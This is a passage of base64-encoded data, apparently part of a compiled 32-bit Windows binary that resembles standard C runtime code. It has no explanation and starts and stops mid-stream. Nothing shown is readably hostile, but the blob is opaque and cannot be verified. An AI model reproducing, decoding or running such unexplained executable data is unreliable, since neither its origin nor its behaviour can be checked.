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3Q5g+gIdC9ISHQdg+gDi4Xw/f//D4UtCQAAg8sIiZ3o/f//6R8JAACDywSJnej9///pCwkAAIPLAevwgcuAAAAA6+iDywLr44D5KnUviweDxwSJveT9//+Jhcj9//+FwA+J2wgAAIPLBPfYiZ3o/f//iYXI/f//6cUIAACLhcj9//9rwAqJhcj9//8PvsGLjcj9//+DwdADyImNyP3//+mdCAAAM8CJhdj9///pkAgAAID5KnUriweDxwSJhdj9//+FwIuF8P3//4m95P3//w+JcggAAION2P3////pZggAAIuV2P3//2vSCg++wYPC0APQiZXY/f//6T4IAACA+Ul0RYD5aHQ4i4Xw/f//gPlsdBSA+XcPhSwIAACBywAIAADp9/7//4A4bHUMQIHLABAAAOnm/v//g8sQ6d7+//+DyyDp5P7//4uF8P3//4oAPDZ1HIu98P3//4B/ATR1EIvHg8ACgcsAgAAA6a7+//88M3Uci73w/f//gH8BMnUQi8eDwAKB4/9////pjv7//zxkD4SqBwAAPGkPhKIHAAA8bw+EmgcAADx1D4SSBwAAPHgPhIoHAAA8WA+EggcAADPAiYW8/f//6wIzwImFxP3//42FiP3//1APtsFQ6AA2AABZWYXAdDiNheD9//9Q/7XQ/f///7W0/f//6LkHAACLjfD9//+DxAyKAUGIhbT9//+JjfD9//+EwA+EYgcAAI2F4P3//1D/tdD9////tbT9///ogQcAAIPEDOn8BgAAD77Bg/hkD4/NAQAAD4RRAgAAg/hTD4/tAAAAdHyD6EF0EEhIdFZISHQISEgPhRgFAACAwSDHhaD9//8BAAAAiI3v/f//i4XY/f//g8tAugACAACJnej9//+NtfT9//+JlcD9//+FwA+JMgIAAMeF2P3//wYAAADpgAIAAPfDMAgAAA+FngAAAIHLAAgAAImd6P3//+mNAAAA98MwCAAAdQyBywAIAACJnej9//+Lldj9//+5////f4P6/3QCi8qLN4PHBIm95P3///fDEAgAAA+EUwQAAIX2dQaLNTx4ARDHhcT9//8BAAAAi8aFyXQPM9JJZjkQdAeDwAKFyXXzK8bR+Ok8BAAAg+hYD4SwAgAASEh0cIPoBw+EJ////0hID4UkBAAAg8cEib3k/f//98MQCAAAdDAPt0f8UGgAAgAAjYX0/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